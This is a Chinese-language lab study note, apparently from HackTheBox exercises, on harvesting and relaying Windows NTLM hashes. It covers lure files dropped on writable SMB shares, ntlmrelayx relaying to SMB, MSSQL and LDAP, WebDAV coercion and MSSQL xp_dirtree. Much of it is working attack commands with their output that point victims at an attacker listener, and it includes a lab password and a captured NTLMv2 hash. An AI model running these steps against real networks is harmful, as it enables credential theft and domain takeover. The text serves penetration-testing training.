哈希收集
1. Farming Hashes
1.1. 滥用共享文件夹
共享文件夹是诱骗目标向我们发起身份验证的常用方式之一,我们可以通过将恶意的文件放入共享文件夹中,让对方来对我们发起访问认证
1.1.1. 枚举
nxc 的--shares可以帮我们进行枚举是否存在匿名可写的共享文件夹
nxc smb ip -u anonymous -p '' --shares
1.1.2. 文件类型
有了目标下一步我们需要了解哪些类型的文件可以用来强制身份验证
最常见的文件类型之一就是.lnk快捷方式文件
- 将图标路径设置为攻击者主机的
UNC路径 - 在文件名开头加
@,确保文件处于顶部,用户访问共享文件夹时,Windows资源管理器就会立刻识别到此文件
1.1.3. ntlm_theft生成恶意文件
使用 ntlm_theft 工具可以帮我们快速生成多个窃取NTLMv2的文件,以下是一些常见的参数
-g:文件类型(all表示全部)-s:服务器地址(我们的监听地址)-f:指定文件名
python3 ntlm_theft.py -g all -s 172.16.117.30 -f '@myfile'
Created: @myfile/@myfile.scf (BROWSE TO FOLDER)
Created: @myfile/@myfile-(url).url (BROWSE TO FOLDER)
Created: @myfile/@myfile-(icon).url (BROWSE TO FOLDER)
Created: @myfile/@myfile.lnk (BROWSE TO FOLDER)
Created: @myfile/@myfile.rtf (OPEN)
Created: @myfile/@myfile-(stylesheet).xml (OPEN)
Created: @myfile/@myfile-(fulldocx).xml (OPEN)
Created: @myfile/@myfile.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
Created: @myfile/@myfile-(includepicture).docx (OPEN)
Created: @myfile/@myfile-(remotetemplate).docx (OPEN)
Created: @myfile/@myfile-(frameset).docx (OPEN)
Created: @myfile/@myfile-(externalcell).xlsx (OPEN)
Created: @myfile/@myfile.wax (OPEN)
Created: @myfile/@myfile.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY)
Created: @myfile/@myfile.asx (OPEN)
Created: @myfile/@myfile.jnlp (OPEN)
Created: @myfile/@myfile.application (DOWNLOAD AND OPEN)
Created: @myfile/@myfile.pdf (OPEN AND ALLOW)
Created: @myfile/zoom-attack-instructions.txt (PASTE TO CHAT)
Created: @myfile/Autorun.inf (BROWSE TO FOLDER)
Created: @myfile/desktop.ini (BROWSE TO FOLDER)
Generation Complete.
1.1.4. 上传到共享文件夹
这里可以优先使用 .url .lnk文件,因为这类文件不需要点开,只要浏览就会被激活。
smbclient.py anonymous@172.16.117.3 -no-pass
Impacket v0.11.0 - Copyright 2023 Fortra
Type help for list of commands
# shares
ADMIN$
C$
CertEnroll
IPC$
NETLOGON
smb
SYSVOL
# use smb
# put @myfile/@myfile.lnk
# exit
1.1.5. 使用 ntlmrelayx 进行中继
这里使用 all://方式直接中继到目标的所有服务
ntlmrelayx.py -tf relayTargets.txt -smb2support -socks
Impacket v0.11.0 - Copyright 2023 Fortra
<SNIP>
[*] Servers started, waiting for connections
Type help for list of commands
ntlmrelayx> [*] SMBD-Thread-13: Connection from INLANEFREIGHT/CMATOS@172.16.117.50 controlled, attacking target smb://172.16.117.50 [-] Authenticating against smb://172.16.117.50 as INLANEFREIGHT/CMATOS FAILED[*] SMBD-Thread-28: Connection from INLANEFREIGHT/CMATOS@172.16.117.50 controlled, attacking target smb://172.16.117.60[*] Authenticating against smb://172.16.117.60 as INLANEFREIGHT/CMATOS SUCCEED
[*] SOCKS: Adding INLANEFREIGHT/CMATOS@172.16.117.60(445) to active SOCKS connection. Enjoy
[*] SMBD-Thread-29: Connection from INLANEFREIGHT/CMATOS@172.16.117.50 controlled, attacking target mssql://172.16.117.60[*] Authenticating against mssql://172.16.117.60 as INLANEFREIGHT/CMATOS SUCCEED
[*] SOCKS: Adding INLANEFREIGHT/CMATOS@172.16.117.60(1433) to active SOCKS connection. Enjoy
ntlmrelayx> socks
Protocol Target Username AdminStatus Port
-------- ------------- -------------------- ----------- ----
SMB 172.16.117.60 INLANEFREIGHT/CMATOS FALSE 445
MSSQL 172.16.117.60 INLANEFREIGHT/CMATOS N/A 1433
观察高亮的输出可以发现:
- SMB线程13表示身份验证来自
172.16.117.50,这里因为认证的目标也是172.16.117.50。因为有自中继防护所以失败了 - SMB 线程
28和29显示中继172.16.117.50的身份验证到172.16.117.60。并且成功连接到SMB和MSSQL服务
1.2. 其他工具
1.2.1. 使用slinky创建恶意lnk
nxc的slinky模块,可以用于创建恶意的Lnk,并且提供了清理选项。
Slinky 能够识别可写共享并自动在其中创建 LNK 文件
┌──(root㉿kali)-[~/Desktop/htb/Academy/NTLM_Relay]
└─# nxc smb -M slinky --options
[*] slinky module options:
SERVER IP of the listening server (running Responder, etc)
NAME LNK file name written to the share(s)
ICO_URI Override full ICO path (e.g. http://192.168.1.2/evil.ico or \\\\192.168.1.2\\testing_path\\icon.ico)
SHARES Specific shares to write to (comma separated, e.g. SHARES=share1,share2,share3)
IGNORE Specific shares to ignore (comma separated, default: C$,ADMIN$,NETLOGON,SYSVOL)
CLEANUP Cleanup (choices: True or False)
nxc smb 172.16.117.3 -u anonymous -p '' -M slinky -o SERVER=172.16.117.30 NAME=important
[*] Ignore OPSEC in configuration is set and OPSEC unsafe module loaded
SMB 172.16.117.3 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:INLANEFREIGHT.LOCAL) (signing:True) (SMBv1:False)
SMB 172.16.117.3 445 DC01 [+] INLANEFREIGHT.LOCAL\anonymous:
SLINKY 172.16.117.3 445 DC01 [+] Found writable share: smb
SLINKY 172.16.117.3 445 DC01 [+] Created LNK file on the smb share
1.2.2. 使用farmer
farmer.exe用于设置一个可以捕获请求(NTLM)的服务器crop.exe,用于创建可以放置在 SMB 共享中的恶意文件fertiliser.exe,可用于污染Office文档
更多内容,请看博客文章Farming for Red Teams: Harvesting NetNTLM
1.3. WebDAV 攻击
以上的攻击的认证方式都是SMB协议,这存在一定的局限性。比如我们希望执行LDAP cross-protocol relay的时候,就无法使用此攻击方式。针对这种情况,我们可以使用WebDAV技术,可以用于强制用户使用 HTTP 而非 SMB 进行身份验证
1.3.1. 什么是Webdev
Web Distributed Authoring and Versioning(webdev)在 RFC 4918 中定义的,它是 HTTP 的扩展,规定了通过 HTTP 执行基本文件操作(如复制、移动、删除和创建文件)的方法;如果我们能找到启用了 WebClient 服务的主机,我们可以向 authentication coercion 工具提供 WebDAV 连接字符串作为监听器,而不是 UNC 连接字符串,从而强制其使用 HTTP NTLM 身份验证来验证我们的攻击机器。
负责 WebDav 的 Windows 服务是 WebClient 服务;与 Windows 服务器不同,该服务在 Windows 工作站上默认启用,但不一定运行
1.3.2. 发现Webdev
可以使用nxc来进行发现
nxc smb <ip> -u 'user' -p 'pass' -M webdav
1.3.3. 利用.searchConnector-ms文件强制开启webClient
如果发现webdev并没有运行的时候,WebClient可能是被停止了,我们可以尝试通过使用 Windows Search Connectors (.searchConnector-ms)文件强制连接到 WebDAV 服务,从而启动该服务。
*.searchConnector-ms 文件是一种特殊文件,用于将计算机的搜索功能连接到特定的 Web 服务或数据库。就像在电脑上安装一个新的搜索引擎一样,它允许用户无需启动浏览器或其他软件,就能快速从该数据源查找信息。它可以强制开启计算机的WebClient服务
<?xml version="1.0" encoding="UTF-8"?>
<searchConnectorDescription xmlns="http://schemas.microsoft.com/windows/2009/searchConnector">
<description>Microsoft Outlook</description>
<isSearchOnlyItem>false</isSearchOnlyItem>
<includeInStartMenuScope>true</includeInStartMenuScope>
<templateInfo>
<folderType>{91475FE5-586B-4EBA-8D75-D17434B8CDF6}</folderType>
</templateInfo>
<simpleLocation>
<url>https://whatever/</url>
</simpleLocation>
</searchConnectorDescription>
1.3.4. 用 drop-sc模块自动化利用
nxc提供了drop-sc 模块,可以帮我们创建文件并将其保存到共享文件夹中
nxc smb 172.16.117.3 -u anonymous -p '' -M drop-sc -o URL=https://172.16.117.30/testing SHARE=smb FILENAME=@secret
[*] Ignore OPSEC in configuration is set and OPSEC unsafe module loaded
SMB 172.16.117.3 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:INLANEFREIGHT.LOCAL) (signing:True) (SMBv1:False)
SMB 172.16.117.3 445 DC01 [+] INLANEFREIGHT.LOCAL\anonymous:
DROP-SC 172.16.117.3 445 DC01 [+] Found writable share: smb
DROP-SC 172.16.117.3 445 DC01 [+] [OPSEC] Created @secret.searchConnector-ms file on the smb share
当用户连接到这个共享文件夹后,计算机上的 WebClient 服务就会启动,会尝试连接到我们在 URL 中指定的 Web 服务器
然后在次检测,会发现目标已经开启了WebClient服务
nxc smb 172.16.117.0/24 -u plaintext$ -p o6@ekK5#rlw2rAe -M webdav
SMB 172.16.117.3 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:INLANEFREIGHT.LOCAL) (signing:True) (SMBv1:False)
SMB 172.16.117.3 445 DC01 [+] INLANEFREIGHT.LOCAL\plaintext$:o6@ekK5#rlw2rAe
SMB 172.16.117.50 445 WS01 [*] Windows 10.0 Build 17763 x64 (name:WS01) (domain:INLANEFREIGHT.LOCAL) (signing:False) (SMBv1:False)
SMB 172.16.117.60 445 SQL01 [*] Windows 10.0 Build 17763 x64 (name:SQL01) (domain:INLANEFREIGHT.LOCAL) (signing:False) (SMBv1:False)
SMB 172.16.117.50 445 WS01 [+] INLANEFREIGHT.LOCAL\plaintext$:o6@ekK5#rlw2rAe
WEBDAV 172.16.117.50 445 WS01 WebClient Service enabled on: 172.16.117.50SMB 172.16.117.60 445 SQL01 [+] INLANEFREIGHT.LOCAL\plaintext$:o6@ekK5#rlw2rAe
1.3.5. 使用Slink触发HTTP身份验证
然后我们使用 slink模块,并指定Webdev的连接格式以强制触发HTTP身份验证,而不是SMB身份验证
webdev格式为\\ANY_STRING@8008\important
nxc smb 172.16.117.3 -u anonymous -p '' -M slinky -o SERVER=NOAREALNAME@8008 NAME=important
[*] Ignore OPSEC in configuration is set and OPSEC unsafe module loaded
SMB 172.16.117.3 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:INLANEFREIGHT.LOCAL) (signing:True) (SMBv1:False)
SMB 172.16.117.3 445 DC01 [+] INLANEFREIGHT.LOCAL\anonymous:
SLINKY 172.16.117.3 445 DC01 [+] Found writable share: smb
SLINKY 172.16.117.3 445 DC01 [+] Created LNK file on the smb share
然后我们使用 Responder 来污染对 NOAREALNAME 名称的请求的响应
1.3.6. reponder +ntlmrelayx
开启Responder毒化
python3 Responder.py -I ens192
用ntlmrelayx进行中继
ntlmrelayx.py -t ldap://172.16.117.3 -smb2support --no-smb-server --http-port 8008 --no-da --no-acl --no-validate-privs --lootdir ldap_dump
Impacket v0.11.0 - Copyright 2023 Fortra
[*] HTTPD(8008): Connection from 172.16.117.50 controlled, attacking target ldap://172.16.117.3
[*] HTTPD(8008): Authenticating against ldap://172.16.117.3 as INLANEFREIGHT/CMATOS SUCCEED
[*] Assuming relayed user has privileges to escalate a user via ACL attack
[*] Dumping domain info for first time
[*] Domain info dumped into lootdir!
--http-port 8008:HTTP中继需要使用,与我们的UNC路径端口一致--no-smb-server:不启动SMB服务器(非必需)
还有一些关于如何让远程系统开启WebClient服务的方法请看这里
1.4. 滥用Mssql
除了smb 和http外,mssql也是比较常用的
我们可以使用 xp_dirtree ,这是一个未公开的 SQL Server 系统扩展过程,它可以列出我们指定路径下的每个文件夹、每个子文件夹和每个文件。下面是一个示例
SQL (darkzero\john.w guest@master)> EXEC xp_dirtree '\\10.10.14.14\share'
subdirectory depth
------------ -----
┌──(root㉿kali)-[~/Desktop/htb/Season9/DarkZero]
└─# responder -I tun0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.5.0
<SNIP>
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.129.136.62
[SMB] NTLMv2-SSP Username : darkzero\DC01$
[SMB] NTLMv2-SSP Hash : DC01$::darkzero:1122334455667788:10F443CB3E706124001EB91C5BAA8EB0:010100000000000080DAF65ACC35DC01C7478242231253E200000000020008005500570042005A0001001E00570049004E002D0034004D0041004A0058003900300046004D003300530004003400570049004E002D0034004D0041004A0058003900300046004D00330053002E005500570042005A002E004C004F00430041004C00030014005500570042005A002E004C004F00430041004C00050014005500570042005A002E004C004F00430041004C000700080080DAF65ACC35DC010600040002000000080030003000000000000000000000000030000094DCC94DBFD6724267FFD40C32D610645ACFD7BC31EAABFD1FFF0384D36652730A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00310034000000000000000000